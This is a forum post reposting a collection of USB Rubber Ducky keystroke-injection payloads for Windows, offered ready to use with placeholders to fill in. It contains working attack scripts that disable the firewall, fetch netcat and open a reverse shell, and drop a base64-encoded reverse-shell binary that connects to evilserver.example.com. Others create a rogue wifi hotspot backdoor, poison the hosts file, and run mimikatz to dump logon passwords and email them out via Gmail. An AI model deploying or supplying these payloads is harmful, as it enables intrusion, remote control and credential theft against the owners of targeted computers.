Jump to content
ponta

Mai multe scripturi

By ponta, in Off-topic

Recommended Posts

ponta Newbie

ponta

Posted
Posted

create an FTP script that logs you in to the FTP server and download netcat

delete the FTP script file

run netcat in daemon mode

run cmd.exe one more time to conceal the command we used in the run history.

Fill in the required information where you see the brackets.

DELAY 10000

GUI R

DELAY 200

STRING cmd

ENTER

DELAY 600

STRING cd %USERPROFILE%

ENTER

DELAY 100

STRING netsh firewall set opmode disable

ENTER

DELAY 2000

STRING echo open [iP] [PORT] > ftp.txt

ENTER

DELAY 100

STRING echo [uSERNAME]>> ftp.txt

ENTER

DELAY 100

STRING echo [PASSWORD]>> ftp.txt

ENTER

DELAY 100

STRING echo bin >> ftp.txt

ENTER

DELAY 100

STRING echo get nc.exe >> ftp.txt

ENTER

DELAY 100

STRING echo bye >> ftp.txt

ENTER

DELAY 100

STRING ftp -s:ftp.txt

ENTER

STRING del ftp.txt & exit

ENTER

DELAY 2000

GUI R

DELAY 200

STRING nc.exe [listENER IP] [listENER PORT] -e cmd.exe -d

ENTER

DELAY 2000

GUI R

DELAY 200

STRING cmd

ENTER

DELAY 600

STRING exit

ENTER

Payload reverse shell

Author: Darren Kitchen with mad props to IllWill dabermania.blogspot.com/2011/04/copying-executable-from-teensy-using.html Duckencoder: 1.0 Target: Windows 7 Description: Opens administrative CMD prompt, creates decoder.vbs containing code to convert base64 encoded ascii to binary, creates text file including base64 ascii of binary file to create reverse shell. converts second file to exe with first file. Executes with host and port parameters. Props to go illwill for this payload. See dabermania.blogspot.com/2011/04/copying-executable-from-teensy-using.html

ESCAPE

CONTROL ESCAPE

DELAY 400

STRING cmd

DELAY 400

MENU

DELAY 400

STRING a

DELAY 600

LEFTARROW

ENTER

DELAY 400

STRING copy con c:\decoder.vbs

ENTER

STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)

STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =

STRING CreateObject("Scripting.FileSystemObject"):

ENTER

STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =

STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function

STRING decodeBase64(base64):

ENTER

STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):

STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub

STRING writeBytes(file, bytes):Dim binaryStream:

ENTER

STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:

STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub

ENTER

CTRL z

ENTER

STRING copy con c:\reverse.txt

ENTER

STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA

ENTER

STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA

ENTER

STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA

ENTER

STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ENTER

STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS

ENTER

STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA

ENTER

STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2

ENTER

STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A

ENTER

STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA

ENTER

STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA

ENTER

STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq

ENTER

STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF

ENTER

STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv

ENTER

STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp

ENTER

STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm

ENTER

STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A

ENTER

STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s

ENTER

STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9

ENTER

STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp

ENTER

STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY

ENTER

STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B

ENTER

STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk

ENTER

STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA

ENTER

STRING AAxAAADpdL7//wAAAAIAAAAMQAAA

ENTER

CTRL z

ENTER

STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe

ENTER

STRING c:\reverse.exe evilserver.example.com 8080

ENTER

STRING exit

ENTER

Payload wifi backdoor

Author: Darren Kitchen Duckencoder: 1.0 Target: Windows 7 Description: Open a CMD bypassing UAC then create a wireless access point with the SSID noobcake and WPA key 12345678, then lower firewall.

CONTROL ESCAPE

DELAY 200

STRING cmd

DELAY 200

MENU

DELAY 100

STRING a

DELAY 100

LEFTARROW

ENTER

DELAY 200

STRING netsh wlan set hostednetwork mode=allow ssid=noobcake key=12345678

ENTER

DELAY 100

STRING netsh wlan start hostednetwork

ENTER

DELAY 100

STRING netsh firewall set opmode disable

ENTER

STRING exit

ENTER

Payload local dns poisoning

The following is a local DNS poisoning attack that changes a hosts host file. The host will then be redirected to the website of your choice (IP Address), every time the user types in the given domain name in their browser.

REM Author:ashbreeze96 and overwraith

GUI R

STRING cmd /Q /D /T:7F /F:OFF /V:ON /K

DELAY 500

ENTER

DELAY 750

ALT SPACE

STRING M

DOWNARROW

REPEAT 100

ENTER

DELAY 50

STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS

DELAY 50

ENTER

DELAY 50

STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS

DELAY 50

ENTER

STRING exit

ENTER

Payload download mimikatz, grab passwords and email them via gmail

This payload:

1. Downloads appropriate mimikatz version via http (I used dropbox)

2. Opens a admin prompt

3. saves mimikatz log to file

4. emails log via gmail

please change these lines to something (keep the single quote):

'url to 32bit mimikatz.exe'

'url to 64bit mimikatz.exe'

'gmailuser', 'gmail password'

'sending email account'

'email account to send report'

Sorry about the wacky delays!

REM Author: Pesce

REM Date: 10/20/2013

REM Note: Thanks to all the help everyone! This is my first attempt, don't be to upset!

REM -------------open command prompt with admin privileges

DELAY 3000

CONTROL ESCAPE

DELAY 1000

STRING cmd

DELAY 1000

CTRL-SHIFT ENTER

DELAY 1000

ALT y

ENTER

DELAY 300

REM -------------download appropriate mimikatz for architecture

STRING powershell if ([system.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('http://url to 32bit mimikatz.exe','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('http://url to 64bit mimikatz.exe','%TEMP%\pw.exe');}

ENTER

DELAY 5000

REM -------------get the passwords and save to c:\pwlog.txt

STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;

ENTER

DELAY 2000

STRING privilege::debug

ENTER

DELAY 1000

STRING sekurlsa::logonPasswords full

ENTER

DELAY 1000

STRING exit

ENTER

DELAY 300

STRING del %TEMP%\pw.exe

ENTER

DELAY 300

REM -------------email log via gmail

STRING powershell

ENTER

DELAY 300

STRING $SMTPServer = 'smtp.gmail.com'

ENTER

STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)

ENTER

STRING $SMTPInfo.EnableSsl = $true

ENTER

STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('gmailuser', 'gmail password');

ENTER

STRING $ReportEmail = New-Object System.Net.Mail.MailMessage

ENTER

STRING $ReportEmail.From = 'sending email account'

ENTER

STRING $ReportEmail.To.Add('email account to send report')

ENTER

STRING $ReportEmail.Subject = 'Duck Report'

ENTER

STRING $ReportEmail.Body = 'Attached is your duck report.'

ENTER

STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')

ENTER

STRING $SMTPInfo.Send($ReportEmail)

ENTER

DELAY 1000

STRING exit

ENTER

REM ---------------------delete and end

STRING del c:\pwlog.txt

ENTER

DELAY 300

STRING exit

ENTER

Sursa : https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...